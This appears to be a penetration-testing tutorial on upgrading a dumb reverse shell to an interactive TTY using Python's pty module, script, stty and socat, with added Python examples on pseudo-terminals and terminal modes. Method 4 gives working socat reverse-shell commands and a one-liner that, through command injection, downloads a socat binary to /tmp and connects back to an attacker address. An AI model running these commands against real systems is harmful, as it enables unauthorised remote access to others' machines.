Method 1: Python pty module
One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module lets you spawn a pseudo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. pty.spawn() runs /bin/bash with the new pseudo-terminal as its stdin, stdout and stderr, and copies bytes between that pseudo-terminal and the standard I/O of the current (dumb) shell, so bash sees a real controlling terminal instead of a bare socket. To upgrade a dumb shell, simply run the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
This will let you run su, for example (in addition to giving you a nicer prompt). On hosts that only ship python3, substitute python3 for python. The local side is still a plain netcat session, though: tab completion and arrow keys won't work, and Ctrl-C kills the listener rather than the remote command, until the local terminal is put into raw mode (see Method 3).
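Why this works, shown as an added example that is not from the original post: the script below uses the same pty module, but via pty.fork() so the child's output can be captured, to run a small probe command once through ordinary pipes and once inside a pseudo-terminal. The probe (a python -c one-liner constructed for this example) reports whether its stdin and stdout are a TTY, which is the check su and similar tools make before they will prompt for a password. upgrade_shell() is just the post's pty.spawn one-liner as a function; the function names are this example's own.

```python
import os
import pty
import subprocess
import sys

# Constructed probe: prints "tty" if the child's stdin and stdout are a terminal,
# "notty" otherwise. Tools such as su make the same check before prompting.
PROBE = [
    sys.executable, "-c",
    "import os; print('tty' if os.isatty(0) and os.isatty(1) else 'notty')",
]


def probe_via_pipes():
    """Run the probe the way a dumb shell runs things: stdin/stdout are pipes."""
    result = subprocess.run(PROBE, stdin=subprocess.DEVNULL,
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()


def probe_via_pty():
    """Run the probe under a pseudo-terminal, as pty.spawn() does for /bin/bash."""
    pid, master_fd = pty.fork()
    if pid == 0:
        # Child: fds 0/1/2 are the slave side of the new pty and it is the
        # controlling terminal, so isatty() is true and /dev/tty can be opened.
        os.execv(PROBE[0], PROBE)
    chunks = []
    while True:
        try:
            data = os.read(master_fd, 1024)
        except OSError:
            break  # Linux raises EIO on the master once the slave side is closed
        if not data:
            break
        chunks.append(data)
    os.close(master_fd)
    os.waitpid(pid, 0)
    # The pty line discipline turns "\n" into "\r\n" on output; strip() removes both.
    return b"".join(chunks).decode().strip()


def upgrade_shell(shell="/bin/bash"):
    """The post's one-liner as a function: blocks until the spawned shell exits."""
    return pty.spawn(shell)


if __name__ == "__main__":
    print("pipes:", probe_via_pipes())  # notty
    print("pty:  ", probe_via_pty())    # tty
```

The pipes case is what a netcat reverse shell looks like to su: no controlling terminal, so it refuses to prompt. Under pty.fork() (or pty.spawn()) the same probe reports a terminal, which is all su needs.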
Method 2: Shell to Bash
Upgrade from sh to bash: script allocates a pseudo-terminal and runs the shell named in SHELL inside it. -q suppresses the start/done messages, and /dev/null is used as the typescript file so nothing is written to disk.
SHELL=/bin/bash script -q /dev/null
Method 3: Fully Interactive TTY
Background the current remote shell (^Z), update the local terminal line settings with stty, and bring the remote shell back to the foreground:
stty raw -echo && fg
raw stops the local terminal from line-buffering input and from turning ^C and ^Z into local signals, so every keystroke goes straight to the remote pty; -echo stops the local terminal echoing what you type, since the remote pty now does that (without it every line you type would appear twice).
After bringing the job back the cursor will be pushed to the left. Reinitialize the terminal with
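What stty raw -echo actually changes, as an added example that is not part of the original post: the code below applies the same terminal-mode change to the slave side of a throwaway pseudo-terminal (a constructed stand-in for the local Kali terminal) using Python's termios and tty modules, reads back the three line-discipline flags that matter, and then restores the saved settings, which is what you have to do by hand to get your terminal back once the remote shell dies. All function names are this example's own.

```python
import os
import pty
import termios
import tty


def terminal_mode(fd):
    """Return the line-discipline flags that decide how keystrokes are handled."""
    lflag = termios.tcgetattr(fd)[3]  # [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
    return {
        "echo": bool(lflag & termios.ECHO),         # terminal echoes what you type
        "canonical": bool(lflag & termios.ICANON),  # input held until Enter (line editing)
        "signals": bool(lflag & termios.ISIG),      # ^C / ^Z become local SIGINT / SIGTSTP
    }


def stty_raw_noecho(fd):
    """Equivalent of `stty raw -echo`; returns the previous settings for a later restore."""
    saved = termios.tcgetattr(fd)
    # tty.setraw clears ICANON, ISIG and IEXTEN (what stty raw does) and also
    # ECHO (what -echo adds), plus input and output post-processing.
    tty.setraw(fd)
    return saved


def restore_terminal(fd, saved):
    """Put the terminal back the way it was (needed after the remote shell dies)."""
    termios.tcsetattr(fd, termios.TCSADRAIN, saved)


def demo():
    """Apply and undo raw mode on a fresh pty pair; returns (before, during, after)."""
    master_fd, slave_fd = pty.openpty()  # constructed stand-in for the local terminal
    try:
        before = terminal_mode(slave_fd)
        saved = stty_raw_noecho(slave_fd)
        during = terminal_mode(slave_fd)
        restore_terminal(slave_fd, saved)
        after = terminal_mode(slave_fd)
    finally:
        os.close(master_fd)
        os.close(slave_fd)
    return before, during, after


if __name__ == "__main__":
    for label, mode in zip(("before", "during", "after"), demo()):
        print(label, mode)
```

On a real terminal the same functions would be called with sys.stdin.fileno(); the post's stty raw -echo && fg one-liner does exactly the "during" change without any Python, and the "after" state is what you want back when the session ends.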
Method 4: Using socat
socat is like netcat on steroids and is a very powerful networking Swiss-army knife. socat can pass full TTYs over TCP connections. If socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat on the attacking side as well to get the full functionality: the listener puts your own terminal (file:`tty`) into raw mode with echo off, and the victim side allocates a pty for bash, so the two ends behave much like an ssh session.
The following commands will yield a fully interactive TTY reverse shell (10.0.3.4 is the listening Kali box; change the address and port to match your setup):
On Kali (listen):
socat file:`tty`,raw,echo=0 tcp-listen:4444
On Victim (launch):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
If socat isn't installed, you're not out of luck. Statically linked socat binaries can be downloaded from andrew-d's static-binaries repo on GitHub (the URL used in the command below). With a command injection vuln, it's possible to download the correct-architecture socat binary to a writable directory, chmod it, then execute a reverse shell in one line:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
On Kali, you'll catch a fully interactive TTY session. It supports tab completion, SIGINT/SIGTSTP, vim, up-arrow history, etc. It's a full terminal. Pretty sweet. The victim host does need outbound HTTPS access to github.com for the download, and the x86_64 path segment in the URL should be swapped for the target's architecture.